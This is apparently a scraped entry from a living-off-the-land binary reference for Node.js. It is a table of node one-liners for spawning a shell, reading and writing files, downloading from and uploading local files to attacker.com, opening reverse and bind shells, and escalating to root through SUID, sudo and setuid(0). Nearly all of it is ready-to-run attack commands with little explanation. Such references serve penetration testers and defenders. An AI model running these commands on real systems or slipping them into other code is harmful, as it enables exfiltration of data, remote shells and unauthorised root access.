| code |
| node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
|
|
|
| code |
| node -e 'require("fs").writeFileSync("file_to_write", "DATA")' |
|
|
| code |
| node -e 'process.stdout.write(require("fs").readFileSync("/bin/ls"))' |
|
|
| description |
code |
| Fetch a remote file via HTTP GET request. |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
node -e 'require("http").get(process.env.URL, res => res.pipe(require("fs").createWriteStream(process.env.LFILE)))'
|
|
|
| description |
code |
| Send a local file via HTTP POST request. |
export URL=http://attacker.com
export LFILE=file_to_send
node -e 'require("fs").createReadStream(process.env.LFILE).pipe(require("http").request(process.env.URL))'
|
|
|
| description |
code |
| Run `nc -l -p 12345` on the attacker box to receive the shell. |
export RHOST=attacker.com
export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin);
sh.stdout.pipe(this);
sh.stderr.pipe(this);
})'
|
|
|
| description |
code |
| Run `nc target.com 12345` on the attacker box to connect to the shell. |
export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
}).listen(process.env.LPORT)'
|
|
|
| code |
| ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'
|
|
|
| code |
| sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
|
|
|
| code |
| ./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
|
|
|
